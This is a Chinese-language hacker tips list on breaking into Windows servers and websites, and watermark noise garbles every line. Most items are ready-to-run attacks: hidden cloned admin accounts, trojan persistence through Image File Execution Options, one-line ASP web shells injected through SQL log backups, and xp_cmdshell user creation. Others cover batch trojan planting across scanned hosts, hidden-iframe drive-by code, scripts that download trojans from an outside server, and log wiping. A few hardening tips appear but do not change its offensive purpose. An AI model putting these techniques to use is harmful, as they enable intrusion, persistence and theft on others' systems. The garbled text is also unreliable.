Xp系统修改权限防止病毒或木马等破坏系统,cmd下,* L2 i, z" t" R
cacls C:\windows\system32 /G hqw20:R
8 m( X8 m& t4 @9 ~思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
/ S' P) O$ B1 C恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F6 } q. _ A. z
% E* f" t# P7 Y D2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。, g# E* J1 Y/ Y) \/ R0 O+ e6 E
3 L; i$ u0 p( N/ F- T$ O3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
& m9 p( C! \$ t% M1 o8 P7 ?4 \% l7 n$ C% Z5 h8 P8 V" t% D
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号7 f$ V/ W, n0 L0 p
" s! \, k6 E: {- I4 q
5、利用INF文件来修改注册表& S, f% } p4 `* l
[Version]. G+ B3 z6 C7 _* V+ m" q$ d: ~ v% z
Signature="$CHICAGO$"
( j3 r5 O1 R. q6 k% d7 T" }[Defaultinstall]
8 ?1 `' K- p- P2 N$ DaddREG=Ating, L' K0 }4 m- M6 V% \* g$ ?
[Ating]9 E- n7 G) U4 [0 k6 ~+ I- t2 \
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"2 s# W! V$ I, ?& j8 u9 r+ U. _
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:8 I/ j( S" C! [9 e8 }# g* X
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径6 X6 F8 l4 \, O4 W! E
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
9 ?3 P1 k4 b1 I/ W' \0 g4 v8 V0 KHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
' x% `, M/ H _! T( QHKEY_CURRENT_CONFIG 简写为 HKCC% e% }' u* ]1 D
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值, B: r+ K% U; b& x7 q# b; \* M
"1"这里代表是写入或删除注册表键值中的具体数据; v' R5 a1 X& E2 D. K/ q
4 X: t3 [+ p; K& K6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
9 T3 a$ d X( M$ k8 } H8 O0 A多了一步就是在防火墙里添加个端口,然后导出其键值$ O/ L" z( o, b1 r3 E0 B) `% h
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
! u- J* ^+ Q2 u2 l
0 M; T5 e, e1 `7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
% K0 a: [$ d6 V1 ^9 d1 m" k在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。0 V: k1 V' }3 j( V
* B; l$ `! @. ~) u( Z8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
! ?1 E+ B5 C$ ]/ y1 z7 M, p* E0 A
$ @' D+ b$ W0 P9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ u x* K! {* h+ G
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
" N/ Z) \' Y) s X- Y% H
. T0 p) P# B$ H3 d' ^( K# z0 x10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”! t- |: G+ B% A' e9 v6 @* T/ n
7 J4 D: e$ p9 m- N+ a6 V11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
# L9 c: a5 O1 \! Q用法:xsniff –pass –hide –log pass.txt j( n1 Z$ s$ q' _7 G. g& L* b
" c* K8 C" W1 h" H- u* @7 \( E( I9 s/ O6 n
12、google搜索的艺术$ L: r0 H' N4 p2 U3 z
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
- U: J; w6 C: c$ A0 L2 i, l或“字符串的语法错误”可以找到很多sql注入漏洞。% ~+ j! W: F* C
# `- s6 ~7 |5 h* o. G0 E
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。1 b. @* U& x: e! ~7 V4 \
! P9 K: f6 y/ J5 n% ]14、cmd中输入 nc –vv –l –p 1987
U3 R- R. G; W' t9 x做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
# \, V+ a8 `) t/ ^3 P ~1 M0 G0 ~) S7 e" ?8 B# ?4 [
15、制作T++木马,先写个ating.hta文件,内容为
x* c% d: \. ~' J<script language="VBScript"> C! b; u9 d; n* w w9 B5 _6 H9 b
set wshshell=createobject ("wscript.shell" )& d7 _" K! t, M
a=wshshell.run("你马的名称",1)
1 T& `: J4 e4 Y6 `window.close% ~# q: _: j0 j% {; ?9 O
</script># q: V! r- h. J, |4 v, f9 W
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
. D* E; S( C2 p9 s
6 T4 L- c$ U4 C2 s8 _2 t3 Q) E16、搜索栏里输入0 v9 ^5 w# L* C" ]
关键字%'and 1=1 and '%'='
- J+ g7 u- j& P2 M; Y) G$ g( `关键字%'and 1=2 and '%'='
% ?2 m. ?; z5 f/ C( X$ D比较不同处 可以作为注入的特征字符# G d9 |& r. }' B. Z6 j: w
. h+ O0 X! L, H g" O2 S17、挂马代码<html>
h6 x' q D- }' ?- e. ?9 x<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
. H+ Q) g( p8 t1 z% ` j</html>
' W9 x4 I% w" l ^ r& V6 y4 ]4 J% i9 W0 o/ m$ v
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
/ \& H6 I. w* ]2 D4 ]; |net localgroup administrators还是可以看出Guest是管理员来。
9 |9 B+ C! F/ c( M w8 Y
9 @! A5 _- Z/ Q' m* U19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等3 u' A% Q) z& A. l* B
用法: 安装: instsrv.exe 服务名称 路径3 {$ O5 r+ N# j( \4 ~
卸载: instsrv.exe 服务名称 REMOVE
: s& \; ?3 f5 g7 U: H" L
' a$ g' c- S1 r# t1 E5 y. S& j- ^, P. }( y6 t# w$ t0 {$ [; K- K
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
. s( F' K" H" \3 T. o- n, X( N' E* i不能注入时要第一时间想到%5c暴库。! c; r5 `$ d% x
$ c; H/ T6 b3 w2 A/ s6 u
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
% s+ C# m0 y0 t) s6 ^: ]
+ m( {. _6 V: \23、缺少xp_cmdshell时* [8 e3 k" c1 X! }. b. O
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
+ }" Z& y( L" b3 [+ C( y假如恢复不成功,可以尝试直接加用户(针对开3389的)1 S3 S( [- a- |+ g2 p
declare @o int3 e" f( W9 ^9 l* m) ^ b% ]5 G3 A7 j" X
exec sp_oacreate 'wscript.shell',@o out' \8 B2 j8 {) i. `4 n
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员. r# m7 \3 K9 c4 ~
8 G7 F4 e W+ Q- ]
24.批量种植木马.bat
X) P4 Y5 i) R% Y" H, mfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中 ~+ Z: e) q+ z( ]/ Y
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间4 q6 Q, g: x# L, T5 J$ q: m
扫描地址.txt里每个主机名一行 用\\开头& U6 W* A# Z! H1 g0 _# Z+ ?
$ c3 k' [6 F8 n8 ^# V, @25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
; G/ n, u3 x) {5 `8 Y2 |7 w2 f! o1 {) N' g# B
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.$ Q6 I$ K0 l4 x( X* z O1 k* x
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
% D- i' r$ @5 {, c6 K.cer 等后缀的文件夹下都可以运行任何后缀的asp木马9 h; w! n& c4 t& Y/ t3 X. T
3 j9 O: u" E3 `! @5 \5 L
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
1 h$ f. j# Y8 C* e: {/ n然后用#clear logg和#clear line vty *删除日志
# @8 Z4 `3 R0 f: M4 {: O" q" X3 |0 l) [
28、电脑坏了省去重新安装系统的方法1 o0 ~" N' h |/ @
纯dos下执行,
- c2 }' z4 g9 W" Txp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config4 r1 L, m% `- L2 e
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
& V$ M( B* r3 O
a" K) L8 ~* a4 @( B1 T; p! m2 I29、解决TCP/IP筛选 在注册表里有三处,分别是: E. B- _' [' U) ^* [0 Y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
4 E- q2 ] R+ @. w5 BHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
. \+ T. r! G8 a: P) Y0 H! ?HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
! `, o7 {8 t2 W' X分别用5 E) j% S' B5 b! r/ v7 b! M
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. I: G8 u/ V, tregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
: o8 m2 p7 K( Xregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; q+ j" o/ p; [; f
命令来导出注册表项
& Y# i4 ]) L0 j$ q1 ^7 z然后把三个文件里的EnableSecurityFilters"=dword:00000001,
6 D' ]) @! p6 T, d+ G0 A D改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用6 A& B! }" G. p+ r
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。* O, K: o) Y" D4 z
8 O9 A/ I3 H. ]( \30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U9 U# g5 x1 T' O3 J- q. S$ z
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的33 O" p6 m* R, v) o
% a1 E; `$ ]6 U. R6 ?% V
31、全手工打造开3389工具; K! b+ X. ?$ c# ]
打开记事本,编辑内容如下:
9 M0 e: x3 c; r7 ]: Jecho [Components] > c:\sql
( k6 @) L% \' ]4 |. s. n/ Hecho TSEnable = on >> c:\sql4 N2 ~6 R0 w0 a- L. H) A8 A7 [
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
% q3 [+ ]) {/ H0 E h5 `编辑好后存为BAT文件,上传至肉鸡,执行+ s" E6 Q8 I3 q' d# |
* n- ~2 \4 f$ ~" b: `32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
& k3 F' N# B, p, E+ R- y. z) q, j6 o' q5 q, R: ]+ \, p* ]% P
33、让服务器重启$ D' x G+ N4 A: w9 u2 _- d0 y6 K
写个bat死循环:
8 q5 H8 J- P% G( z@echo off
$ C: n% N; a7 F f1 }:loop1
d5 Y' T# A; C4 g- Z bcls, u- w# U/ L2 i# q2 D1 Z: n
start cmd.exe' Y/ \) G: }" [4 K, _
goto loop1
- [, w) _; P: [: I( g0 M; B3 S保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
) I% `& P6 o! {& Q! V
5 q4 {) q n( v( _- T: ~3 V34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,; T: G& X8 _1 B' j; B4 `+ o; P
@echo off- d; Q- T/ c4 J! n8 t4 N1 p% U
date /t >c:/3389.txt
# @$ e- O' `8 J. ~; @$ Ktime /t >>c:/3389.txt% P1 J+ v; T7 \0 Q
attrib +s +h c:/3389.bat
& ]: f# f' a) E' P% g4 [% b& Uattrib +s +h c:/3389.txt
) d5 `( c( \3 {9 e' {' ?$ Jnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
: s2 U+ L% H' @& s, i% f+ H并保存为3389.bat
) R. _- o+ R# f打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号- t7 o1 B% t# a# A3 g3 E3 U
7 @% k3 `& g8 N! y# V: E1 R35、有时候提不了权限的话,试试这个命令,在命令行里输入:
- N& n Q4 Y5 _9 J" mstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
( G* {) l5 B+ z3 J输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。6 j7 Z% }+ O) u6 Y% w* g) P4 f
+ T& ]& Z$ m9 Q' [! s8 h: P* z4 J
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
+ G6 g; \2 u9 K# S$ J- ~# C7 n/ {echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址- q+ B4 Y' I- i; H/ g1 M
echo 你的FTP账号 >>c:\1.bat //输入账号
6 k; C7 s6 \. ?5 Qecho 你的FTP密码 >>c:\1.bat //输入密码6 k7 W" N* R2 d# z
echo bin >>c:\1.bat //登入
1 P# |( w3 ^* J) G' _5 j( ]echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么8 g( F8 l2 u$ ~7 k3 N/ g) n+ e
echo bye >>c:\1.bat //退出
( O c- s' K8 G. h( k$ x8 @" f0 @然后执行ftp -s:c:\1.bat即可
$ J% j7 ^4 V2 n0 y
! A$ @( k' E7 s2 c6 B* i/ O37、修改注册表开3389两法
& X% I/ s8 W5 M& m(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表0 `; r3 ]" Q! ]: H! A6 r
echo Windows Registry Editor Version 5.00 >>3389.reg
$ k! F& V6 o8 w$ q+ O9 i, S9 ` Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
! `* y& {% L3 @: j9 j! r, eecho "Enabled"="0" >>3389.reg
# b, C6 z" v2 k0 e9 T* qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
# A: o$ @, {8 [+ mNT\CurrentVersion\Winlogon] >>3389.reg6 W/ K8 y$ @9 V. I5 p
echo "ShutdownWithoutLogon"="0" >>3389.reg
) B0 H& a: y- }) ~, m" Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]2 u$ b% z3 [; C& ^
>>3389.reg! Z- x7 a$ _7 d. K2 G9 Q
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
" p& z# X/ q5 @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
$ S6 o9 K, w$ A>>3389.reg: d/ ]4 x( e$ w; [' X& I' A
echo "TSEnabled"=dword:00000001 >>3389.reg' \# x' @6 ]# P8 m& ~3 O2 p- T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
: R& D7 {: I9 Y: K4 q, R( X, H' pecho "Start"=dword:00000002 >>3389.reg
* z& i. u Z4 E. A! T/ Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
* P1 I" G1 J( K1 s, N, B>>3389.reg- E7 y5 Q% E# L# d3 ^5 t
echo "Start"=dword:00000002 >>3389.reg8 P- F$ a3 K3 p+ G8 Y; G2 v2 R
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- z% |; c0 o9 ]echo "Hotkey"="1" >>3389.reg% o3 L3 Q8 C& ^3 K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% F- H; X" H& D
Server\Wds\rdpwd\Tds\tcp] >>3389.reg/ y5 H; Z8 H r7 d( L. h& r
echo "PortNumber"=dword:00000D3D >>3389.reg
+ |# k8 j4 G. P8 {. kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ s$ a# _" R1 \5 |) \
Server\WinStations\RDP-Tcp] >>3389.reg6 w8 P& |5 M! ~$ k# ?, K) x6 E
echo "PortNumber"=dword:00000D3D >>3389.reg9 K; M( W2 Z3 E# O8 R+ t
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
1 Q/ k. y- h! ~, t% R O8 |; c(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
* X, r( j5 f/ Z6 r& y: ~. s d因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效 o% T8 N* q {9 u
(2)winxp和win2003终端开启
# `( `/ r$ v4 h" a用以下ECHO代码写一个REG文件:
. |. M1 j3 y/ i4 K0 Wecho Windows Registry Editor Version 5.00>>3389.reg
3 D; b, i7 g9 C7 |8 O1 H8 xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: A& |8 g# w% {Server]>>3389.reg$ K" P/ ~' e1 e& `: f% e5 S
echo "fDenyTSConnections"=dword:00000000>>3389.reg5 ~5 V" t7 i1 y6 }9 L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& W N% }! q% L
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
! a' g& }9 x! h3 g5 J+ \1 Pecho "PortNumber"=dword:00000d3d>>3389.reg: X$ @# T/ ?4 G6 P; C* S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( _, w1 y# h, H
Server\WinStations\RDP-Tcp]>>3389.reg
3 m/ C7 [5 v* R# H8 o2 Kecho "PortNumber"=dword:00000d3d>>3389.reg
" V: s/ n9 Y5 h2 h2 [; t$ |然后regedit /s 3389.reg del 3389.reg% N7 r# d4 W; [" t" f' L; ?
XP下不论开终端还是改终端端口都不需重启
0 ~( b; q- {: m, ]* z
9 l. e& S; j: @38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
1 f- d6 B; v7 D# @7 ^用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
+ L& S0 u4 A: a" T& g5 c- E
2 d0 N. L5 _$ i3 ~9 R, r/ H39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
& S* U3 u1 x- h6 ?; t(1)数据库文件名应复杂并要有特殊字符" W5 w8 m7 x* @* z7 D+ ?
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
$ m7 `( y, L& c! Y. A将conn.asp文档中的9 \' i; M, M4 I2 Q4 O
DBPath = Server.MapPath("数据库.mdb")& V! r- Z" L- j
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
% D. U* X7 |" L/ l8 A; \6 q5 J- }0 J( l( \
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
5 S# y4 ? g2 v5 o6 f1 N* U+ d(3)不放在WEB目录里5 @$ E: S7 g8 C/ ^
; P# s: H$ \# {/ N$ w3 x( H P
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉. H8 E9 v: \5 z |
可以写两个bat文件" a, ?4 o4 z3 @/ i& q
@echo off
$ a+ d _2 g8 X! C: m* |@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
9 O& S0 H! R% b. u$ |! W@del c:\winnt\system32\query.exe% L) H9 e5 f o+ j# f5 b
@del %SYSTEMROOT%\system32\dllcache\query.exe
$ S; p6 E4 r! q( {@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
! Y5 ?; x: x* a6 l* Q# G, Z7 Y; J" W
@echo off
' T( Z) f4 M3 ~4 w) B9 V@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
5 E. T/ j& N7 {" o8 ^1 V@del c:\winnt\system32\tsadmin.exe
4 f; L3 R( F6 z# \! A* F- I@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex3 d! y# n- t2 B n/ j$ S
0 U; p1 Z& {! f+ G: _5 F41、映射对方盘符/ V% b4 T! ?0 u" |/ B% U6 a& y
telnet到他的机器上,
( H3 P. h8 z% Anet share 查看有没有默认共享 如果没有,那么就接着运行$ X0 O6 }" i4 x! c, |" @
net share c$=c:
& X& Z0 ] ]8 f' Q/ r$ ~net share现在有c$8 m, t! u. g- P& r
在自己的机器上运行% _( t; _- w2 Z# f
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
- \! F9 J! D% x, Q" M3 y9 q, k( R* ^! Y; F; W$ _3 `3 ~' R
42、一些很有用的老知识
$ l! N, O: A7 vtype c:\boot.ini ( 查看系统版本 )5 @+ o: y' J6 B9 ^/ l
net start (查看已经启动的服务)) N9 h m0 j% l( ~4 S
query user ( 查看当前终端连接 )
7 k& l+ n# g9 Lnet user ( 查看当前用户 )
" X1 i3 d) c, r" U. z/ }4 V7 Enet user 用户 密码/add ( 建立账号 )$ K- H3 `6 f. R3 ~3 S
net localgroup administrators 用户 /add (提升某用户为管理员)
# C2 W& L+ J; \6 U) v4 _ipconfig -all ( 查看IP什么的 )
" a/ p9 u' T) w/ d- J: cnetstat -an ( 查看当前网络状态 )
4 \( b3 u; g- Nfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码); ]& A0 s4 E8 T( X! _2 ]
克隆时Administrator对应1F4- p; k* ?6 t+ h7 ?5 h
guest对应1F5; [. J q% [# I) x: O9 e6 G
tsinternetuser对应3E8
$ C M- i# [, F) ~8 U9 d( Q) t4 p- H4 L' `6 Z, L' w
43、如果对方没开3389,但是装了Remote Administrator Service: ?( t& ]8 |# x2 J: G+ B2 h3 E
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
( D9 W/ M3 t' F, x" o5 z9 |解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
- a9 H5 V$ Y1 w. a7 G3 Z$ ]* s" Z先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
$ V! b+ h( I; e) v- F
A: p. L- q6 H# Y6 G8 w44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
8 b6 V5 g" m- R9 U3 N$ r8 |& \本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)+ o% H3 O4 ^8 q% }: C* r. q
1 m- H0 z( Q: O) m4 a9 f
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)* K" f! h6 J! O8 c ?
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
$ W! F& ^/ {7 H; o^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
/ b* ^0 D( j: I0 DCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =& U& X# c# |( j$ y
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs/ D! Z! Y. l! B0 r6 K6 H1 B2 e' t
(这是完整的一句话,其中没有换行符)( P8 S1 m; y' W/ W3 t" C
然后下载:
# ?$ j: Q t9 J) q$ m d3 Qcscript down.vbs http://www.hack520.org/hack.exe hack.exe; t6 X' A1 U& q t% D5 m- f. h
. X$ S" T/ Y. s# r- W46、一句话木马成功依赖于两个条件:4 X5 Q# E: P! t' j! m* j5 X7 y
1、服务端没有禁止adodb.Stream或FSO组件6 f9 ^( d- d3 i! L( [1 k
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。* P0 ^+ N" z: G, G) }6 v7 j: m" \: H
3 K. n2 J- O! d/ B47、利用DB_OWNER权限进行手工备份一句话木马的代码:
8 J& T. U: N6 Y9 u;alter database utsz set RECOVERY FULL--8 x8 ?% |. _3 R1 f
;create table cmd (a image)--
" H) T7 x7 y$ w! \6 _- P f;backup log utsz to disk = 'D:\cmd' with init--
# n( K; ]& |4 };insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--: z: w9 F! p1 |$ R
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
3 W( [# `7 G9 c注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。9 w' |) h- P0 R/ w) n& h
3 j: X$ [2 R* F% w48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:, S* k" z. Z4 Q
! g' [5 q& n8 k" I( U, s用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
, z: Y+ j, R5 W所有会话用 'all'。% R8 J/ _1 y: x+ {; ]# n6 e
-s sessionid 列出会话的信息。
, x3 n0 p1 _5 |4 i8 {2 I) l- R-k sessionid 终止会话。1 I9 [4 _! O9 Z6 l9 F
-m sessionid 发送消息到会话。
! d3 O! g0 |, d) Q8 E9 `9 S. `7 |# k% U, I
config 配置 telnet 服务器参数。
) a# L' T+ P2 W9 h9 L( e |+ V, R( M: w1 {5 U5 _
common_options 为:
& ^0 s/ R! T2 {: {: b* P-u user 指定要使用其凭据的用户
- I6 L" _& O, z ~-p password 用户密码
$ n0 D' Z0 E- C- r0 \0 b
0 r" w" S. |" o, ?/ Wconfig_options 为:. M6 c3 e" a" ]% u
dom = domain 设定用户的默认域+ G* U4 I5 L' V O7 ~9 u9 e
ctrlakeymap = yes|no 设定 ALT 键的映射
) U9 l/ i. Q% Y4 K8 z k9 T$ Ntimeout = hh:mm:ss 设定空闲会话超时值
3 i2 D% `, |4 M k: x' Otimeoutactive = yes|no 启用空闲会话。
; A/ W6 l( `. t- A7 X- Cmaxfail = attempts 设定断开前失败的登录企图数。
9 ?/ [) n7 Y. u# x% L) r" Omaxconn = connections 设定最大连接数。
' q6 m' t8 ?9 }port = number 设定 telnet 端口。
3 W7 B9 J( N& f9 m3 gsec = [+/-]NTLM [+/-]passwd
/ g: P: Q5 L+ y f( c$ L* C设定身份验证机构) w* ?/ K7 c' {4 g
fname = file 指定审计文件名。9 ?5 F! S% o* D, O/ x% g% m
fsize = size 指定审计文件的最大尺寸(MB)。
- ]' a4 R ~) R! {7 N: n$ pmode = console|stream 指定操作模式。! c) r |" T3 i: [0 Q5 g7 _: z. m
auditlocation = eventlog|file|both
: M. X. k9 i: c+ [8 b( T( a指定记录地点
" S3 ?9 d s- ] Xaudit = [+/-]user [+/-]fail [+/-]admin" j4 v7 g# o+ M( E: p# f- B+ ?
5 J7 @( e+ m4 G. t
49、例如:在IE上访问:* X/ B7 X- j1 p% \
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
% Y2 }1 i3 E5 u2 [: U' W3 jhack.txt里面的代码是:
) _% a: c D5 N K: C<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">% I; }% H! N7 ]3 ]
把这个hack.txt发到你空间就可以了!7 E+ [$ r1 Y% m) s. Q0 P7 W
这个可以利用来做网马哦!5 i, k: e7 n- [- S
' x3 ?+ {: }3 A
50、autorun的病毒可以通过手动限制!
& e/ Q3 R$ M, b0 J1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
4 U" }8 e4 O8 y+ v2,打开盘符用右键打开!切忌双击盘符~
! h. n; ]8 h6 o$ R3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!8 w' ]4 v7 q# e8 _8 C% h
+ [2 J. ?7 O5 b5 J1 @9 I51、log备份时的一句话木马:' T' S* _) z. m5 M
a).<%%25Execute(request("go"))%%25>
: N% t* b0 A* N$ ?5 Mb).<%Execute(request("go"))%>8 t% }6 }: R& h4 c1 N, o
c).%><%execute request("go")%><%. W) i: Y! |, `/ J5 F
d).<script language=VBScript runat=server>execute request("sb")</Script>
& E+ }% C5 T/ v% i0 Ue).<%25Execute(request("l"))%25>
6 m. U% O, y. ~3 O0 S4 I: G$ b! [ tf).<%if request("cmd")<>"" then execute request("pass")%>
% j3 q. Y4 l8 F
' p/ E4 I! c* {8 L1 s' Q$ m1 z. |52、at "12:17" /interactive cmd
: V+ _ Q; \# y e执行后可以用AT命令查看新加的任务
& q: @1 [2 I5 s& u! H4 A9 Y用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。# T: o8 f: o, r8 E
' F, ^ j& e6 i5 g5 H( t5 ]
